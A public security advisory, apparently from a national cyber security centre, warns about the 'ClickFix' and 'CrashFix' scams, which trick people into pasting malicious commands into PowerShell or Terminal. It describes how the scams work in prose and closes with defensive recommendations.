24.02.2026 - The NCSC is currently seeing a rise in reports involving the "ClickFix" infection method. In these cases, people are misled by fake technical problems into manually inserting and running malicious code via their computer's command line. This approach bypasses technical security measures by effectively authorising the infection of their own systems.
The "ClickFix" scam relies on social engineering. The name suggests a quick "fix" for a technical problem offered through a simple "click". Attackers exploit poorly secured websites or use online advertisements to lead people to malicious pages. When you visit the page, a convincing overlay or pop-up appears.
The message displayed states that a technical problem has occurred, such as a failed browser update, a DNS error or an issue with displaying content. The most common issue is a request to solve an alleged CAPTCHA. A button is displayed to "fix" the issue.
From the browser to the command line
People often fail to realise that simply opening the website copies a malicious PowerShell command (on Windows) or Terminal command (on macOS) to the clipboard. They are then instructed to use seemingly harmless keyboard shortcuts. In reality, these shortcuts open the command line and paste the previously copied code. Pressing Enter immediately executes the command and downloads malware.
Potential impact
Once executed, the script attempts to connect to a server and download a malicious program. While direct malware downloads are often blocked by antivirus software, in this case, the download command is issued by the user themselves within their own permissions context. Consequently, many security mechanisms do not raise an alert. In most cases, an infostealer is installed. This type of malware specialises in extracting passwords from browsers, emptying crypto wallets, and stealing session cookies. These cookies enable attackers to access accounts (such as email or corporate systems) without a password. In corporate environments, this can be the first step towards a later ransomware attack.
An expanded approach: "CrashFix"
Additional approaches have emerged since the beginning of the year. One of these is "CrashFix". This scam method s distributing manipulated browser extensions disguised as useful tools, such as ad blockers. These extensions are programmed to crash the browser deliberately after a delay. When the browser is restarted, a message appears, prompting the user to 'repair' the alleged error by entering specific commands. In reality, these commands are used to install malware.
Recommendations
- Be sceptical of any website that claims your browser needs updating or that an error can only be fixed by running commands. Official browser updates are handled via the browser's built-in settings, not via a website.
- Never copy and paste code or commands from a source you do not know directly into PowerShell, Terminal or the command prompt.
- Do not install software from unknown sources.
- Raise awareness of this specific scam among staff. One of the most effective protective measures is knowing that a website would never legitimately ask someone to manually enter system commands.
- In corporate environments, check whether PowerShell script execution can be restricted for standard users.
- If you have fallen victim to such an attack, report the incident.
Current statistics
Last week's reports by category:
Last modification 24.02.2026
